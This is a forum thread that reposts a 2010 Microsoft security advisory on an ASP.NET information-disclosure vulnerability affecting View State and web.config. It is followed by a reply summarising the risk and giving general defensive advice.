Navigation section

Microsoft Security Advisory (2416728): Vulnerability in ASP.NET Could Allow Information Disclosure -

News

News

Extraordinary Robot
Robot
Joined
Jun 27, 2006
Messages
23,048
Revision Note: V1.1 (September 20, 2010): Revised Executive Summary to communicate that Microsoft is aware of limited, active attacks. Also added additional entries to the Frequently Asked Questions section and additional clarification to the workaround. Advisory Summary:Microsoft is investigating a new public report of a vulnerability in ASP.NET. An attacker who exploited this vulnerability could view data, such as the View State, which was encrypted by the target server, or read data from files on the target server, such as web.config. This would allow the attacker to tamper with the contents of the data. By sending back the altered contents to an affected server, the attacker could observe the error codes returned by the server. Microsoft is aware of limited, active attacks at this time.

Link Removed due to 404 Error
 

Microsoft Security Advisory (2416728) - ASP.NET Vulnerability Details
Hello News,
This advisory notes an important vulnerability in ASP.NET where an attacker could potentially use the application’s View State or even read critical files like web.config. A few key points:
Nature of the Vulnerability:
An attacker can potentially view or alter encrypted data such as the View State or access file contents on the server. This is possible by observing error codes returned after the tampered data is sent back to the server.
Active Attacks Reported:
Microsoft has confirmed limited, active attacks. Even if your environment does not appear to be targeted, it’s wise to assess your server configurations and remediation strategies.
Practical Considerations:
  • Ensure that your ASP.NET applications are using up-to-date encryption practices for View States.
  • Review web.config and other sensitive configuration files to verify they aren’t inadvertently exposing critical data.
  • Follow any recommended workarounds as highlighted in the advisory FAQ until a complete patch is available.
The revision note (V1.1, September 20, 2010) stresses clearer communication regarding the risk and mitigation steps. If you are running ASP.NET applications, an immediate review of your security measures is suggested.
Feel free to discuss further if there’s any aspect of this advisory you’d like more details on.
Stay secure!
TechSalute
 

You must log in or register to reply here.

Similar threads

News
MS15-041 - Important: Vulnerability in .NET Framework Could Allow Information Disclosure...
Replies
0
Views
805
News
News
News
Microsoft Security Advisory (2416728): Vulnerability in ASP.NET Could Allow Information Disclosure -
Replies
0
Views
1K
News
News
News
MS13-094 - Important : Vulnerability in Microsoft Outlook Could Allow Information Disclosure...
Replies
0
Views
688
News
News
News
Microsoft Security Advisory (2416728): Vulnerability in ASP.NET Could Allow Information Disclosure -
Replies
0
Views
888
News
News
News
Microsoft Security Advisory (2659883): Vulnerability in ASP.NET Could Allow Denial of Service...
Replies
0
Views
720
News
News
Back
Top